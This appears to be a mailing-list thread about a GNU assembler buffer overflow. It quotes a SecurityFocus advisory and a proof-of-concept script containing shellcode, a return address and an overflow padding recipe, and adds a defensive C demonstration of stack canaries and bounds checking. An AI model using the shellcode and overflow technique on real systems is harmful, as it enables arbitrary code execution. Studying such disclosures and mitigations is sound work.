gas Buffer Overflow


gas Buffer Overflow

Sebastian Rother
http://www.securityfocus.com/bid/19555

"GNU binutils GAS (GNU assembler) is prone to a buffer-overflow
vulnerability because it fails to properly bounds-check user-supplied
input before copying it to an insufficiently sized memory buffer.

Remote attackers may crash the application or execute arbitrary machine
code in the context of the application."

Exploit from Sec-Focus:

#!/bin/sh
#
# gas overflow poc, <[hidden email]>

returnaddr='\xc4\xea\xff\xbf'
shellcode='\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0
\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd
\x80\xe8\xe5\xff\xff\xff/bin/id'

printf '#include <stdio.h>\n'
printf '#define EGG "%s"\n' "$shellcode"
printf '#define RET "%s"\n' "$returnaddr"
printf '#define NOP "%s"\n' "`perl -e 'print "\\\x90"x100'`"
printf '#define PAD "%s"\n' "`perl -e 'print "A"x1990'`"

cat << __EOF__
#include <stdio.h>

int main (int argc, char **argv)
{
                __asm__ (PAD RET NOP EGG);
}
__EOF__


I didn't check if it was fixed by the "patches" OpenBSD ships with
gcc but I don't think so.
It would be neat if somebody with more knowledge would be able to tell
me if oBSD is affected or not. :)

Kind regards,
Sebastian


Re: gas Buffer Overflow

Miod Vallat
> I didn't check if it was fixed by the "patches" OpenBSD ships with
> gcc but I don't think so.

The problem exists but gets caught by propolice.

Miod
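The two points the thread turns on are the bug class in the advisory (an input copied into a fixed-size buffer without a length check) and the mitigation Miod names (ProPolice, which places a guard word after stack buffers and aborts when it has been overwritten). The following is an added illustration, not code from this thread, from binutils or from the SecurityFocus entry: it models a stack frame as a struct holding a 16-byte operand buffer followed by a canary, runs an input through an unchecked copy and a bounds-checked copy, and reports whether the guard was clobbered and whether the checked copy rejected the input. The buffer size, the constant canary value and the `classify` helper are assumptions for the demonstration; a real ProPolice canary is randomized per process and the check runs in the function epilogue.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated stack frame (assumption): a fixed-size operand buffer with a
 * ProPolice-style guard word directly after it, where the compiler would
 * place the canary between local arrays and saved registers. */
#define OPERAND_MAX 16
#define CANARY 0xDEADC0DEu      /* constant for the demo; real canaries are random */

struct frame {
    char buf[OPERAND_MAX];
    uint32_t canary;
};

/* Unchecked copy: the pattern the advisory describes. The input length is
 * never compared with the buffer size. To keep the demonstration
 * well-defined C, the write is clamped to the size of the whole struct,
 * so it never leaves the object; any input longer than OPERAND_MAX still
 * runs into the guard word, exactly as it would on a real stack. */
static void copy_unchecked(struct frame *f, const char *input)
{
    size_t n = strlen(input) + 1;   /* include the terminating NUL */
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy((char *)f, input, n);
}

/* Bounds-checked copy: the fix the advisory implies. Anything that does
 * not fit together with its terminator is refused instead of copied. */
static int copy_checked(struct frame *f, const char *input)
{
    size_t n = strlen(input);
    if (n >= OPERAND_MAX)
        return -1;
    memcpy(f->buf, input, n + 1);
    return 0;
}

/* The guard check a ProPolice epilogue performs before returning. */
static int canary_intact(const struct frame *f)
{
    return f->canary == CANARY;
}

/* Runs one input through both copies on a fresh frame each time.
 * Returns a bitmask:
 *   bit 0: the unchecked copy overwrote the guard (what ProPolice aborts on)
 *   bit 1: the checked copy rejected the input */
int classify(const char *input)
{
    struct frame f;
    int result = 0;

    memset(&f, 0, sizeof f);
    f.canary = CANARY;
    copy_unchecked(&f, input);
    if (!canary_intact(&f))
        result |= 1;

    memset(&f, 0, sizeof f);
    f.canary = CANARY;
    if (copy_checked(&f, input) != 0)
        result |= 2;

    return result;
}

/* Constructed oversized operand in the spirit of the PoC's PAD (1990 'A's),
 * without any address or payload bytes. */
const char *padded_operand(void)
{
    static char pad[1991];
    memset(pad, 'A', sizeof pad - 1);
    pad[sizeof pad - 1] = '\0';
    return pad;
}

int main(void)
{
    const char *samples[] = { "movl", "AAAAAAAAAAAAAAA", "AAAAAAAAAAAAAAAA" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s -> guard clobbered: %d, rejected by check: %d\n",
               samples[i], classify(samples[i]) & 1, (classify(samples[i]) >> 1) & 1);
    int r = classify(padded_operand());
    printf("1990-byte pad        -> guard clobbered: %d, rejected by check: %d\n",
           r & 1, (r >> 1) & 1);
    return 0;
}
```

The interesting boundary is the 16-character input: it fits the buffer but its terminator lands on the guard's low byte, so the unchecked copy trips the canary while the checked copy, which counts the terminator, already refuses it. That is why the check uses `>=` rather than `>`, and it is the same off-by-one that a stack protector catches only at runtime, after the overwrite has happened.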